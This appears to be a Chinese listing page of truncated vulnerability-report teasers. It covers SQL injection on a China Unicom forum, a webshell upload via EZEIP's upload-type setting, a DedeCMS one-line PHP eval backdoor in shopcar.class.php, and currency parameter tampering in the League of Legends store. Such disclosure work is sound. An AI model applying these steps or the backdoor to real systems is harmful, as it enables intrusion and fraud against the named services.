-
中国联通开发者社区注射漏洞
http://dev.wo.com.cn/bbs/viewthread.jsp?tid=46666&page=1&authorid=1oracle盲注 。。。目测可以拿论坛后台。。继续目测的话也许webshell。。可惜盲...
-
EZEIP3.0 getwebshell 漏洞
先修改IE浏览器的安全设置,调制最高,然而禁止js执行。 然后打开修改上传类型页面,添加aspx类型,点击保存,再打开上传页面上传,上传后,马儿就乖乖待在那了! 修改上传类型页面:http://www.iick.blog/whir_syst...
-
dedecms 5.7 一句话后门利用 exp
author:舞林tx微博:http://t.qq.com/wulinlw晚上看到这个http://www.wooyun.org/bug.php?action=view&id=5416shopcar.class.php 被植入一句话...
-
Dedecms源码或遭入侵被植入一句话后门
DedeCMS V5.7 SP1正式版 UTF-8 GBK版本疑似被植入一句话后门 前几日下载并不存在此代码 详细说明:shopcar.class.php被植入一句话@eval(file_get_contents('php://input'...
-
英雄联盟参数控制不严导致刷钱漏洞
http://store.lol.qq.com/store/purchase/item这个action中。currency_type参数控制不严。比如需要游戏金币买的东西,他原本的值为currency_type=ip他action判断cur...
